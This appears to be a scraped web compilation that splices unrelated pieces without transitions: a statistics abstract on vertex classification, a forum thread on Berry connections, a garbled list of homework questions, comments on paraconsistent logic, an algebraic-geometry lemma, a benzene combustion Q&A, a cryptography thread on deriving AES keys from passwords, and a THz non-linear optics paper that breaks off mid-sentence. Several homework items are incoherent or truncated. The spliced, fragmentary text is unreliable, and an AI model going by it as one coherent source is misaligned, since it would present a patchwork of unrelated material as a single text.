## The Annals of Statistics
### Universally consistent vertex classification for latent positions graphs
#### Abstract
In this work we show that, using the eigen-decomposition of the adjacency matrix, we can consistently estimate feature maps for latent position graphs with positive definite link function $\kappa$, provided that the latent positions are i.i.d. from some distribution $F$. We then consider the exploitation task of vertex classification where the link function $\kappa$ belongs to the class of universal kernels, class labels are observed for a number of vertices tending to infinity, and the remaining vertices are to be classified. We show that minimization of the empirical $\varphi$-risk for some convex surrogate $\varphi$ of 0–1 loss over a class of linear classifiers with increasing complexities yields a universally consistent classifier, that is, a classification rule with error converging to Bayes optimal for any distribution $F$.
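The embedding step described above — estimating feature maps from the eigen-decomposition of the adjacency matrix — can be sketched numerically. The following minimal adjacency spectral embedding of a simulated random dot product graph is an illustration only; the simulation setup (latent positions, dimensions) is an assumption, not taken from the paper.

```python
import numpy as np

rng = np.random.default_rng(0)

# Simulate a latent position (random dot product) graph: X_i i.i.d. from F,
# with edge probabilities P_ij = <X_i, X_j>.
n, d = 400, 2
X = rng.dirichlet(np.ones(3), size=n)[:, :2]   # latent positions; inner products lie in [0, 1]
P = X @ X.T
A = (rng.random((n, n)) < P).astype(float)
A = np.triu(A, 1)
A = A + A.T                                    # symmetric, hollow adjacency matrix

# Adjacency spectral embedding: eigenvectors of the top-d eigenvalues (by magnitude),
# scaled by the square roots of those eigenvalues.
vals, vecs = np.linalg.eigh(A)
top = np.argsort(np.abs(vals))[::-1][:d]
X_hat = vecs[:, top] * np.sqrt(np.abs(vals[top]))
# X_hat estimates X up to an orthogonal transformation.
```

The embedded points `X_hat` can then be fed to any linear classifier on the labelled vertices, which is the exploitation task the abstract describes.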
#### Article information
Source
Ann. Statist., Volume 41, Number 3 (2013), 1406-1430.
Dates
First available in Project Euclid: 1 August 2013
https://projecteuclid.org/euclid.aos/1375362554
Digital Object Identifier
doi:10.1214/13-AOS1112
Mathematical Reviews number (MathSciNet)
MR3113816
Zentralblatt MATH identifier
1273.62147
#### Citation
Tang, Minh; Sussman, Daniel L.; Priebe, Carey E. Universally consistent vertex classification for latent positions graphs. Ann. Statist. 41 (2013), no. 3, 1406--1430. doi:10.1214/13-AOS1112. https://projecteuclid.org/euclid.aos/1375362554
# Matrix elements of non-normalizable states
Tags:
1. Jan 13, 2016
### taishizhiqiu
Although strictly speaking quantum mechanics is defined on $L_2$ (the space of square-integrable functions), non-normalizable states appear throughout the literature.
In this case, textbooks adopt an alternative normalization condition. For example, for $\psi_p(x)=\frac{1}{\sqrt{2\pi\hbar}}e^{ipx/\hbar}$,
$\langle\psi_p|\psi_{p'}\rangle=\delta(p-p')$
However, it is not easy to calculate matrix elements this way. For example, how does one calculate
$A(k)=i\langle u(k)|\partial_k|u(k)\rangle$
$A(k)$ is actually the Berry connection in solid-state band theory, and $u(k)$ is the periodic part of the Bloch wave function.
Can anyone tell me how to define these matrix elements?
Last edited: Jan 13, 2016
2. Jan 13, 2016
### vanhees71
I do not understand your notation, defining $A(k)$. It simply doesn't make any sense to me. Where does this come from?
3. Jan 13, 2016
### taishizhiqiu
According to Bloch's theorem, wave functions in crystals have the form $\psi_k(x)=e^{ikx}u_k(x)$, where $u_k(x+a)=u_k(x)$ and $a$ is the lattice constant.
So $\langle u(k)|\partial_k|u(k)\rangle$ should be something like $\int u^*_k(x)\partial_k u_k(x)dx$, although this doesn't make sense as written because the integral is infinite.
$A$ is the Berry connection where the adiabatic parameter is $k$ (https://en.wikipedia.org/wiki/Berry_connection_and_curvature). This quantity is heavily used in the theory of topological insulators.
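In numerical practice, the ill-defined derivative is sidestepped by discretizing $k$ and computing the Berry phase from gauge-invariant overlaps of neighbouring eigenvectors (a Wilson loop). A minimal Python sketch for a two-band SSH-type chain — the specific model and parameters are illustrative assumptions — computes the Zak phase of the lower band:

```python
import numpy as np

def ssh_hamiltonian(k, v, w):
    """2x2 Bloch Hamiltonian of an SSH chain with hoppings v (intracell) and w (intercell)."""
    h = v + w * np.exp(-1j * k)
    return np.array([[0.0, h], [np.conj(h), 0.0]])

def zak_phase(v, w, nk=400):
    """Discrete Berry (Zak) phase of the lower band via a Wilson loop of overlaps."""
    ks = np.linspace(0.0, 2.0 * np.pi, nk, endpoint=False)
    us = [np.linalg.eigh(ssh_hamiltonian(k, v, w))[1][:, 0] for k in ks]
    us.append(us[0])  # close the loop; H(2*pi) = H(0)
    wilson = 1.0 + 0.0j
    for i in range(nk):
        wilson *= np.vdot(us[i], us[i + 1])  # vdot conjugates the first argument
    return -np.angle(wilson)
```

For $w > v$ the phase comes out as $\pm\pi$ (topological) and for $v > w$ as $0$. Because each $u_{k_i}$ enters the product once as a bra and once as a ket, the arbitrary phase attached to each eigenvector by the eigensolver cancels — which is exactly the gauge ambiguity that makes the naive $\langle u(k)|\partial_k|u(k)\rangle$ ill-defined.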
How to make a thing math problem up
Question:
How to make a thing math problem up
Ephemeral art can be defined as... (a) art that is not permanent (b) an oil painting (c) art that is in a museum (d) art that is portable
Why did the Second Continental Congress not want a strong central government?
What action did the United States take after World War I?
Find the following sum: 4 + 7 + 10 + 13 + ... + 40 + 43
The following question refers to a hypothetical situation. You are a member of your county's board of supervisors. At a public meeting of the board of supervisors, one county resident gets up and shouts at you for raising the state sales tax. After he is finished, you calm the man down and explain to him that you are not responsible for raising the state sales tax and that if he has a problem with the move he should address it with his district representative. He responds with, "Well, do you con
Yugoslavia broke up into a number of small countries after communist control ended in the late 1980s because of ____? A) Pressure from Western European nations B) Tensions between different ethnic groups C) The lack of a common currency D) The desire of some republics to remain Communist
A ladder that is 30 feet long is placed against a house. The base of the ladder is 8 feet from the base of the house. How far up the house does the ladder reach? Round your answer to the nearest tenth of a foot.
Choose the correct article and adjective for the following word: children — the, nice, Nice, the, he, the, Nice, Sympathetic
By ___, cos(θ) = x/r, and by ___, sin(θ) = y/r. Multiplying both sides of the above equations by r, we get that x = r cos(θ) and y = r sin(θ). The ___ states that x² + y² = r². By ___, we have [r cos(θ)]² + [r sin(θ)]² = r². Applying the ___, the equation can be written as r² cos²(θ) + r² sin²(θ) = r². Dividing both sides of the equation by r² results in cos²(θ) + sin²(θ) = 1.
In long division, what is 28 ÷ 6691?
When inhaled, crystalline silica can cause scar tissue to form on what organs?
What are the two major political parties in the US? How are they different?
British statesman and proponent of British imperialism. He challenged the British people to create an empire by stating that it was their duty, a great honor, and the divinely ordered mission of their country. Question 2 options: Benjamin Disraeli, Dr. David Livingstone, Ferdinand de Lesseps
The shoot system of a beavertail cactus consists of broad paddle-like structures covered with clusters of spines. The spines are modified leaves, so the flat green paddles must be modified _____. (Concept 35.1) roots / stems / leaves / buds / None of the listed responses is correct.
Help pls I really need it?
What additional information would you need to prove the triangles congruent by ASA?
Can someone please give me a short chapter 2 summary of The Outsiders please?? :)
Rawls thinks that people are justified in owning the objects and wealth that they do when:
Suppose the price of apples increases from $20 to $27, and in response quantity demanded decreases from 108 to 98. Using the mid-point formula, what is the price elasticity of demand?
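Two of the quantitative questions in the list above can be checked mechanically; a quick Python sketch using only values stated in the questions:

```python
# Arithmetic series 4 + 7 + 10 + ... + 43: common difference 3, so 14 terms.
series_sum = sum(range(4, 44, 3))  # equivalently n * (first + last) / 2 = 14 * 47 / 2

# Mid-point (arc) formula for the apples question.
p1, p2 = 20, 27
q1, q2 = 108, 98
elasticity = ((q2 - q1) / ((q1 + q2) / 2)) / ((p2 - p1) / ((p1 + p2) / 2))
# series_sum = 329; elasticity ≈ -0.33 (inelastic, since |elasticity| < 1)
```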
by Kaya Stechly 1562 days ago | link | parent | on: Paraconsistent Tiling Agents (Very Early Draft) Section 4.1 is fairly unpolished. I’m still looking for better ways of handling the problems it brings up; solutions 4.1 and 4.2 are very preliminary stabs in that direction. The action condition you mention might work. I don’t think it would re-introduce Löbian or similar difficulties, as it merely requires that $$\overline{a}$$ implies that $$G$$ is ‘true only’, which is a truth value found in $$LP$$. Furthermore, we still have our internally provable T-schema, which does not depend on the action condition, from which we can derive that if the child can prove $$(\overline{a}\rightarrow G)\land\lnot(\overline{a}\rightarrow\lnot G)$$, then so can the parent. It is important to note that “most” (almost everything we are interested in) of $$\mathcal{PA}\star$$ is consistent without problem. Now that I think about it, your action condition should be a requirement for paraconsistent agents, as otherwise they will be willing to do things that they can prove will not accomplish $$\mathcal{G}$$. There may yet be a situation which breaks this, but I have not come across it. reply
by Kaya Stechly 1567 days ago | Jessica Taylor likes this | link | parent | on: Paraconsistent Tiling Agents (Very Early Draft) 1. Any extension of $$LP$$ will work as well unless it leads to triviality; however, we cannot in general validate the $$T$$-schema for an arbitrary conditional. For example, any conditional $$\rightarrow$$ that satisfies the inference of contraction ($$\alpha\rightarrow(\alpha\rightarrow\beta)\Vdash\alpha\rightarrow\beta$$) will succumb to Curry’s paradox and lead to triviality (consider the fixed point formula $$\gamma$$ of the form $$T(\gamma)\rightarrow\perp$$). Now, as far as I can tell, we can validate the T-schema of the conditional for $$RM_3$$; since $$LP\supset$$’s conditional is expressively equivalent, it seems like it shouldn’t be too hard to show that we can also validate its T-schema. For further discussion on the topic (with proofs, etc.), see chapter 8 of Priest’s part of volume XI of the second edition of Gabbay and Guenthner’s Handbook of Philosophical Logic (what a mouthful of of’s). A thorough presentation of $$LP$$ can be found in Priest’s An Introduction to Non-Classical Logics, section 7.4. Sections 7.1–7.3 introduce the general structures of such logics and delineate their differences. This book does not say much about truth schemas. Priest’s paper “The Logic of Paradox” from ’79 also describes $$LP$$, although I find the presentation a bit clunky. For a better grasp of how inference works in $$LP$$, look at section III.9; there are examples of both inferences that are true and inferences that do not always hold even though we may expect them to. I will probably be writing up a minimal formal description soon, as I code the Prolog meta-interpreter. We can prove non-triviality of $$LP$$ and that the T-schema holds, so as a consequence Löb must fail. This seems somewhat unsatisfactory as an answer to which step fails.
I can think of a few reasons why Löb might fail; I haven’t seen a discussion of this in the literature, so I will try to cobble together an answer, or the shape thereof, from what I know. One possible reason is that pseudo modus ponens fails in LP. That is, though $$A,A\rightarrow B$$ might entail $$B$$ for a well-chosen conditional, $$A\wedge (A\rightarrow B)\rightarrow B$$ must fail or else lead to triviality due to Curry’s paradox. More likely is that this is a consequence of the way paraconsistency interacts with modal logic. From the Wikipedia article you linked, we have that “in normal modal logic, Löb’s axiom is equivalent to the conjunction of the axiom schema 4 ($$\Box A\rightarrow\Box\Box A$$) and the existence of modal fixed points.” We have both of those, so the difference must stem from the phrase “normal modal logics.” The proof uses the existence of a modal fixed point of a certain form; this may not hold in a modal extension of $$LP$$ (which would be analogous to $$KM_3$$, the modal extension of $$RM_3$$, just as $$K$$ is the modal extension of classical logic). More details on modal extensions of paraconsistent logics can be found in McGinnis’ paper “Tableau Systems for Some Paraconsistent Modal Logics,” though this paper does not mention modal fixed points. In fact, none of the papers I’ve read so far on paraconsistent modal logics have mentioned fixed points. I would construct a proof on my own, but I am currently too unfamiliar with modal logic; if it is important, I can go learn enough and do it. Thanks for your comments! I hope to have at least somewhat answered your questions. Paraconsistency is still to me a very strange subject, so my studies and understanding are still very much incomplete. reply
Lemma 76.12.5. In Situation 76.12.1 let $K$ be as in Lemma 76.12.2. For any étale morphism $U \to X$ with $U$ quasi-compact and quasi-separated we have
$R\Gamma (U, K) \otimes _ A^\mathbf {L} A_ n = R\Gamma (U_ n, \mathcal{F}_ n)$
in $D(A_ n)$ where $U_ n = U \times _ X X_ n$.
Proof. Fix $n$. By Derived Categories of Spaces, Lemma 74.27.3 there exists a system of perfect complexes $E_ m$ on $X$ such that $R\Gamma (U, K) = \text{hocolim}_ m R\Gamma (X, K \otimes ^\mathbf {L} E_ m)$. In fact, this formula holds not just for $K$ but for every object of $D_\mathit{QCoh}(\mathcal{O}_ X)$. Applying this to $\mathcal{F}_ n$ we obtain
\begin{align*} R\Gamma (U_ n, \mathcal{F}_ n) & = R\Gamma (U, \mathcal{F}_ n) \\ & = \text{hocolim}_ m R\Gamma (X, \mathcal{F}_ n \otimes ^\mathbf {L} E_ m) \\ & = \text{hocolim}_ m R\Gamma (X_ n, \mathcal{F}_ n \otimes ^\mathbf {L} E_ m|_{X_ n}) \end{align*}
Using Lemma 76.12.3 and the fact that $- \otimes _ A^\mathbf {L} A_ n$ commutes with homotopy colimits we obtain the result. $\square$
# How does energy evolve in the INCOMPLETE combustion of benzene...?
Nov 19, 2016
You might have to qualify your question here.
#### Explanation:
I can easily write a stoichiometric equation for the incomplete combustion of benzene:
${C}_{6} {H}_{6} \left(l\right) + 6 {O}_{2} \left(g\right) \rightarrow 4 C {O}_{2} \left(g\right) + C O \left(g\right) + C \left(s\right) + 3 {H}_{2} O \left(l\right)$
Is this balanced? Don't trust my arithmetic.
Of course, I don't know that this precise stoichiometry will occur, but given thermodynamic parameters (which you have omitted!), we could work out the enthalpy change of the reaction.
The complete combustion of benzene occurs according to the stoichiometry...
${C}_{6} {H}_{6} \left(l\right) + \frac{15}{2} {O}_{2} \left(g\right) \rightarrow 6 C {O}_{2} \left(g\right) + 3 {H}_{2} O \left(l\right)$
And we would expect the thermal output of this reaction to be greater than that of the former. Why so?
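Given those thermodynamic parameters, the calculation is mechanical. As a sketch for the complete combustion, using approximate textbook standard enthalpies of formation (illustrative values in kJ/mol, not data supplied with the question):

```python
# Standard enthalpies of formation, kJ/mol (approximate textbook values).
dHf = {"C6H6(l)": 49.0, "O2(g)": 0.0, "CO2(g)": -393.5, "H2O(l)": -285.8}

reactants = {"C6H6(l)": 1.0, "O2(g)": 7.5}
products = {"CO2(g)": 6.0, "H2O(l)": 3.0}

# Hess's law: dH = sum(dHf of products) - sum(dHf of reactants)
dH = (sum(n * dHf[s] for s, n in products.items())
      - sum(n * dHf[s] for s, n in reactants.items()))
# dH comes out near -3267 kJ per mole of benzene burned completely
```

Repeating the sum for the incomplete stoichiometry (which additionally needs ΔHf values for CO(g) and C(s)) gives a smaller heat release, which answers the closing "Why so?": CO and soot still carry oxidizable chemical energy that complete combustion would have released.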
MathSciNet bibliographic data MR418168 (54 #6210) 58F20 Mayer, Dieter H. On a $\zeta$ function related to the continued fraction transformation. Bull. Soc. Math. France 104 (1976), no. 2, 195–203. Article
# AES: Why is it a good practice to use only the first 16 bytes of a hash for encryption?
I'd like to encrypt text with AES/CTR and a password defined by the user, in Java. I already checked the internet (and Stack Overflow) for answers. The most common approach is to hash the user's password with SHA-1 and take only the first 16 bytes.
But I don't think this can be a good practice:
1. SHA-1 is weak.
2. Taking only the first 16 bytes makes the hash also weak and raises the chance of a collision (even with SHA-256).
Is this really the best practice? Why? How can I do things better?
Some links to the articles I mentioned:
• They are not good sources. Anyway I will call this question as dupe of this and this – kelalaka Apr 4 at 18:28
• Nowadays you should probably use HKDF with an appropriate hash. – jww Apr 5 at 2:42
• Collision is irrelevant. The chance of 128-bit hash (thus key) collision for different passwords is very low unless you have at least thousands of times more users than exist on Earth (about 2^44) and anyway there's no harm as long as you do not also reuse the same nonce for different data. If the (96-bit) nonce is independently random that chance is infinitesimal; if the nonce is systematic (e.g. counter) or synthetic (SIV) there is zero chance. The real and serious danger is using a fast hash on password input, as correctly answered by Ella. – dave_thompson_085 Apr 5 at 15:50
Why is it a good practice to use only the first 16 bytes of a hash for encryption?
As you noted, it isn't.
But, the problem is not with the "16 bytes" part of the statement, or the concern for collisions. The problem is with the "hash" part.
## 16 bytes
As stated in one of the links you shared, AES only uses key sizes of 128, 192, and 256 bits (or 16, 24, and 32 bytes, respectively). So the key must be one of these sizes, because AES simply does not support other key sizes.
Trying to use a larger key could have a variety of possible outcomes depending on what the implementation chooses to do. It might raise an exception, or continue silently while only using the first N bits of the supplied key.
## Hashing a password to use as an encryption key
Using a hash function such as MD5, SHA-1, SHA-2, SHA-3, or BLAKE2 would be bad practice. The first two are obvious: MD5 and SHA-1 are known to be weak in general.
But even using a strong cryptographic hash like SHA-3 or BLAKE2 would be bad, because they were not designed to solve the problem of deriving a key from a password. A cryptographic hash function is involved in that process, but it is not the entirety of it.
Good practice would be to use a dedicated key derivation function such as Argon2 that was designed to solve this problem. If your library doesn't support Argon2 but supports scrypt, bcrypt or PBKDF2, any of these three is also a reasonable choice.
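As a sketch of what this looks like in code — PBKDF2 here, since it needs no third-party package; the iteration count is an illustrative choice, not a recommendation:

```python
import hashlib
import os

password = b"user-supplied password"
salt = os.urandom(16)  # random per-key salt; stored next to the ciphertext, need not be secret

# dklen=16 yields a 16-byte (128-bit) AES key directly; no truncation of a hash involved.
key = hashlib.pbkdf2_hmac("sha256", password, salt, 600_000, dklen=16)
```

In Java, the analogous standard-library route is `SecretKeyFactory.getInstance("PBKDF2WithHmacSHA256")`.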
## Why/How
A normal hash function is designed to be fast and to require little space.
A hash function designed for use on passwords is quite the opposite: it is a slow function that requires lots of memory access, in an attempt to optimize the function towards what a consumer CPU is good at and to minimize the potential for optimization with special hardware. Specialized hardware is usable by an attacker, but a legitimate user is limited to a commodity CPU; the goal is to use a function that cannot take advantage of special hardware to the extent possible.
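The cost asymmetry is easy to demonstrate: compare the per-guess cost of a plain hash against a deliberately slow KDF. This is a rough, illustrative benchmark (absolute timings depend on the machine, and the iteration count is an assumed value):

```python
import hashlib
import time

salt = b"\x00" * 16                       # fixed salt, for benchmarking only
guesses = [f"guess{i}".encode() for i in range(2000)]

start = time.perf_counter()
for g in guesses:
    hashlib.sha256(salt + g).digest()     # fast hash: the attacker tests guesses cheaply
fast_total = time.perf_counter() - start

start = time.perf_counter()
for g in guesses[:20]:
    hashlib.pbkdf2_hmac("sha256", g, salt, 100_000)
slow_total = (time.perf_counter() - start) * (len(guesses) / 20)  # extrapolated to 2000 guesses
# slow_total exceeds fast_total by orders of magnitude: that is the attacker's per-guess bill
```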
Details about the hows and whys of password hashing are listed in this paper and quoted below (with minor modifications, e.g. removing citations and modified formatting):
Cryptographic Security: The scheme should be cryptographically secure and as such possess the following properties:
• 1) Preimage resistance
• 2) Second preimage resistance
• 3) Collision resistance.
In addition it should avoid other cryptographic weaknesses such as those present in (some) Merkle-Damgård constructions (e.g., length-extension attacks, partial message collisions, etc.)
Defense against lookup table / TMTO attacks:
• The scheme should aim to make TMTO attacks that allow for precomputed lookup table generation, such as Rainbow Tables, infeasible
Defense against CPU-optimized 'crackers':
• The scheme should be ‘CPU-hard’, that is, it should require significant amounts of CPU processing in a manner that cannot be optimized away through either software or hardware. As such, cracking-optimized (multi-core) CPU software implementations (eg. written in assembly, testing multiple input sets in parallel) should offer only minimal speed-up improvements compared to those intended for validation (“slower for attackers, faster for defenders”).
Defense against hardware-optimized 'crackers':
• The scheme should be 'memory-hard', that is, it should require significant amounts of RAM capacity in a manner that cannot be optimized away through e.g. TMTO attacks. As such, cracking-optimized ASIC, FPGA and GPU implementations should offer only minimal speed-up improvements (e.g. in terms of time-area product) compared to those intended for validation. As noted by Aumasson, one of the main scheme design challenges is ensuring minimized efficiency on GPUs, FPGAs and ASICs (in order to minimize benefits of cracking-optimized implementations) and maximized efficiency on general-purpose CPUs (in order to maintain regular-use efficiency).
Defense against side-channel attacks:
• Depending on the use-case (eg. for key derivation or authentication to a device seeking to protect against modification by the device owner) side-channel attacks might be a relevant avenue of attack. Password hashing schemes should aim to offer side-channel resilience. With regards to password hashing scheme security we will focus on security versus the cache-timing type of side-channel attacks given the existence of such attacks against the commonly used scrypt scheme. The second category of side-channel attacks we will take into consideration are so-called Garbage Collector Attacks (GCAs). GCAs have been discussed in literature as an instance of a 'memory leak' attack relevant to password hashing scheme security. GCAs consist of a scenario where an attacker has access to a target machine's internal memory either after termination of the hashing scheme or at some point where the password itself is still present in memory (the so-called WeakGCA variant)...
• Nitpick: bcrypt is advertised as a password storage and verification function, not so much a key derivation function, and implementations routinely have APIs to match that (e.g., outputting text encoded output, providing an enroll/verify API instead of a hash API, That is not to claim that bcrypt couldn't be used as you suggest, but there are potential practical pitfalls. See, e.g., this article. – Luis Casillas Apr 4 at 22:00
• @LuisCasillas just a note: I actually didn't list bcrypt; that was inserted to my answer by Gilles via an edit... – Ella Rose Apr 4 at 22:35
• @LuisCasillas Argon2 was also the winner of the password hashing competition, not the password-based KDF competition. Is there any reason to believe that Argon2 is good for PBKDF that doesn't also apply to bcrypt? – Gilles Apr 4 at 23:46
• @Gilles The PHC call for submissions had a requirement that the outputs look random, which to my mind implies such suitability. But really, the biggest pitfalls I'm thinking of here aren't conceptually deep; they come down to bcrypt implementations doing stuff like producing ASCII output like "$2a$" + cost + "\$" + base64(salt + hash). At the level of (un)sophistication we're dealing with in this question I worry somebody might literally use the ASCII string's bytes. – Luis Casillas Apr 5 at 9:46
• @firendlyQuestion: Yes, provided you use an Argon2 implementation or API that produces binary output. The tricky detail here is that some implementations of such functions are coded to be friendly to callers who are using them for password storage instead of key derivation. – Luis Casillas Apr 5 at 9:48 |
# Giant non-linear susceptibility of hydrogenic donors in silicon and germanium
## Abstract
Implicit summation is a technique for the conversion of sums over intermediate states in multiphoton absorption and the high-order susceptibility in hydrogen into simple integrals. Here, we derive the equivalent technique for hydrogenic impurities in multi-valley semiconductors. While the absorption has useful applications, it is primarily a loss process; conversely, the non-linear susceptibility is a crucial parameter for active photonic devices. For Si:P, we predict the hyperpolarizability ranges from χ(3)/n3D = 2.9 to 580 × 10−38 m5/V2 depending on the frequency, even while avoiding resonance. Using samples of a reasonable density, n3D, and thickness, L, to produce third-harmonic generation at 9 THz, a frequency that is difficult to produce with existing solid-state sources, we predict that χ(3) should exceed that of bulk InSb and χ(3)L should exceed that of graphene and resonantly enhanced quantum wells.
## Introduction
Multiphoton absorption requires a high intensity, and was first observed shortly after the invention of the laser using impurities in solids1 and alkali vapor2. Although multiphoton absorption is useful for metrology and modulators, and can be enhanced where there is near-resonance of an intermediate state as in the case of Rb3, it is essentially a loss process contributing an imaginary part to the non-linear susceptibility. The corresponding real part is responsible for a great variety of wavelength conversion processes such as harmonic generation, first observed in quartz4 and later in atomic vapors5 including alkalies6. THz multiphoton absorption has been shown to be very large in hydrogenic shallow impurities in semiconductors, even without intermediate state resonances7, due to the large dielectric screening and low effective mass. Here, we predict giant values for the real part of the THz non-linear susceptibility for doped silicon and germanium. This finding opens access to novel applications for these materials in THz photonics. For example, tripling the output of a 2–4 THz quantum cascade laser through third-harmonic generation would fill the frequency gap currently only filled by larger, more expensive systems. We show that a good efficiency can be obtained for third-harmonic generation with doped silicon and germanium. Our theory can be readily applied to any donor in any semiconductor host where the effective mass approximation is valid, and our discussion makes it clear that a giant value of χ(3) is expected for donors with a small binding energy in a host with a large dielectric constant and small effective mass.
The theory developed in this paper is appropriate for frequencies both near to and far from loss-inducing resonances, including the effects of effective mass anisotropy, multi-valley interactions and the central cell correction. The method could easily be applied to other systems with complicated potentials, such as multi-quantum wells. Although this work focuses on perturbative harmonic generation, we anticipate that shallow impurities may also be useful for non-perturbative high-harmonic generation (HHG)8,9 taking advantage of the excellent control over the carrier-envelope phase of few-cycle pulses in this THz regime, which can be used to enhance HHG10.
## Results
### The implicit summation technique
From Nth-order perturbation theory7,11 the N-photon absorption (NPA) transition rate may be written as
$$w^{(N)} = 2\pi \frac{\left(2\pi \alpha_{fs}\right)^N}{N} \left| M^{(N)} \right|^2 \left[ \frac{E_H^2}{\varepsilon_r^{N/2} I_a^N} \right] \frac{I_m^N \, \Gamma^{(N)}}{\hbar^2}$$
(1)
where $$I_a = E_H^2/\hbar a_B^2$$, aB is the Bohr radius, EH the Hartree energy, and αfs the fine structure constant. M(N) is a dimensionless transition matrix element, and Im is the intensity of the light in the medium with relative dielectric permittivity εr. The lineshape function Γ(N)(ω) has unit area. For silicon and germanium donors, the factors inside the bracket are renormalized, and of particular importance here Ia is ten orders of magnitude smaller for silicon than it is for hydrogen. This is apparent from the formulae of the Hartree energy and Bohr radius for donors in these materials: $$E_H = m_t(e^2/4\pi \epsilon _0\varepsilon_r \hbar )^2$$, and $$a_B = 4\pi \epsilon _0\varepsilon_r \hbar ^2/m_te^2$$, where mt is the transverse effective mass and $$\varepsilon_r$$ the dielectric constant12. Both germanium and silicon have a small mt and large $$\varepsilon_r$$, raising the Bohr radius and lowering the binding energy. The wavefunction is therefore significantly larger than that of alkali atoms, leading to an enhanced dipole matrix element and hence a substantially stronger interaction with light.
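The scaling can be checked with a back-of-envelope calculation. The numbers below use textbook silicon values m_t ≈ 0.19 m_e and ε_r ≈ 11.7 (assumptions of this sketch; the paper uses the spectroscopically fitted E_H ≈ 39.9 meV and a_B ≈ 3.17 nm):

```python
# Effective "atomic units" for a silicon donor, scaled from hydrogen.
# Assumed material parameters (not the paper's fitted values):
mt, eps_r = 0.19, 11.7                 # transverse mass (units of m_e), dielectric constant

E_H_hydrogen_eV = 27.2114              # Hartree energy of hydrogen
a_B_hydrogen_nm = 0.0529177            # Bohr radius of hydrogen

E_H_meV = mt/eps_r**2 * E_H_hydrogen_eV * 1e3   # ~38 meV (paper: 39.9 meV)
a_B_nm = eps_r/mt * a_B_hydrogen_nm             # ~3.3 nm  (paper: 3.17 nm)

# I_a = E_H^2/(hbar a_B^2) scales as m^4/eps^6 relative to hydrogen:
ratio = mt**4 / eps_r**6                        # ~5e-10, i.e. roughly ten orders smaller
```

The small discrepancy with the quoted values reflects the fitted, rather than textbook, band parameters used in the paper.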
The details of the spectrum given by Eq. (1) are controlled by M(N), which is influenced in silicon by the indirect valley structure, the anisotropic effective mass, and the donor central cell correction potential. Our main aim here is to calculate these effects. For single-photon absorption (N = 1) between states |ψg〉 (the ground state) and |ψe〉 (the excited state), $$M^{(1)} = \left\langle {\psi _e\left| {{\boldsymbol{\epsilon }}.{\boldsymbol{r}}} \right|\psi _g} \right\rangle /a_B$$, where $${\bf{\epsilon }}$$ is a unit vector in the polarization direction, and Eq. (1) reduces to Fermi’s golden rule. For two-photon absorption,
$$M^{(2)} = \frac{E_H}{\hbar a_B^2} \sum_j \frac{\left\langle \psi_e \left| \boldsymbol{\epsilon}\cdot\boldsymbol{r} \right| j \right\rangle \left\langle j \left| \boldsymbol{\epsilon}\cdot\boldsymbol{r} \right| \psi_g \right\rangle}{\omega_{jg} - \omega_{eg}/2}$$
in the E.r gauge, which may be written as M(2) = 〈ψe|ζG1ζ|ψg〉 where $$\zeta = {\boldsymbol{\epsilon }}.{\boldsymbol{r}}/a_B$$,
$$G_n = \frac{E_H}{\hbar} \sum_j \frac{\left| j \right\rangle \left\langle j \right|}{\omega_{jg} - n\omega}$$
(2)
and ω = ωeg/N. The states |j〉 are intermediate states, and along with |ψe〉 & |ψg〉 they are eigenstates of $$H\left| j \right\rangle = \hbar \omega _j\left| j \right\rangle$$, where H is the Hamiltonian in the dark. For general multiphoton absorption,
$$M^{(N \ge 2)} = \left\langle \psi_e \left| \zeta G_{N-1} \zeta \cdots \zeta G_2 \zeta G_1 \zeta \right| \psi_g \right\rangle$$
(3)
The summation in Eq. (2) can be avoided11 by noticing that (H − Wn)Gn = EH, where Wn = ħ(ωg + nω) and ω = ωeg/N as already mentioned, and by using the completeness relation $$\sum_j \left| j \right\rangle \left\langle j \right| = 1$$. In other words,
$$G_n = E_H \left( H - W_n \right)^{-1}$$
(4)
Rewriting Eq. (3), M(N) = 〈ψe|ζ|ψN−1〉 where |ψ0〉 = |ψg〉 and |ψn〉 is the solution of the partial differential equation (PDE) $$G_n^{ - 1}\left| {\psi _n} \right\rangle = \zeta \left| {\psi _{n - 1}} \right\rangle$$. Instead of finding M(N) by repeated application of Eq. (2), which requires infinite sums (that might be reduced down to a few terms if there are obvious resonances), we may now use Eq. (4) and the PDE at each stage, which can be simpler.
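As a concrete illustration of the implicit-summation idea (a minimal sketch, not the authors' multi-valley FEM code), the ω = 0 limit of the same trick is the textbook Dalgarno–Lewis calculation of the static polarizability of hydrogen: rather than summing over intermediate states as in Eq. (2), one solves a single differential equation for |ψ1⟩ and reads off α = −2⟨ψ0|z|ψ1⟩ (exact value 9/2 atomic units). The finite-difference grid, box size, and the sign convention (H0 − E0)|ψ1⟩ = −z|ψ0⟩ are choices made for this sketch:

```python
import numpy as np

# Dalgarno-Lewis sketch in atomic units: solve (H0 - E0) psi1 = -z psi0 for
# hydrogen, with psi1 = f(r) cos(theta) (an l = 1 function), instead of the
# infinite sum over intermediate states.  E0 = -1/2, psi0 = exp(-r)/sqrt(pi).
h, R = 0.02, 25.0                      # grid step and box radius (choices)
r = np.arange(h, R, h)

# Radial ODE: -f''/2 - f'/r + f/r^2 - f/r + f/2 = -r exp(-r)/sqrt(pi),
# discretized with central differences and Dirichlet boundaries f(0) = f(R) = 0.
main = 1.0/h**2 + 1.0/r**2 - 1.0/r + 0.5
upper = -0.5/h**2 - 1.0/(2*h*r[:-1])
lower = -0.5/h**2 + 1.0/(2*h*r[1:])
A = np.diag(main) + np.diag(upper, 1) + np.diag(lower, -1)
b = -r*np.exp(-r)/np.sqrt(np.pi)

f = np.linalg.solve(A, b)              # the "implicit sum" done in one linear solve

# alpha = -2 <psi0| z |psi1> = -2 (4 pi/3) (1/sqrt(pi)) * integral of f e^{-r} r^3 dr
alpha = -2*(4*np.pi/3)/np.sqrt(np.pi) * np.sum(f*np.exp(-r)*r**3)*h
print(alpha)                           # close to the exact 9/2
```

The same structure, with Wn in place of E0 and the previous-stage solution on the right-hand side, is applied at each stage of the chain in Eq. (3).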
The Nth-order susceptibility far from any multiphoton resonances may also be calculated using the Nth-order perturbation theory13. For example, the “resonant” term in the third-order susceptibility, χ(3)(3ω), is
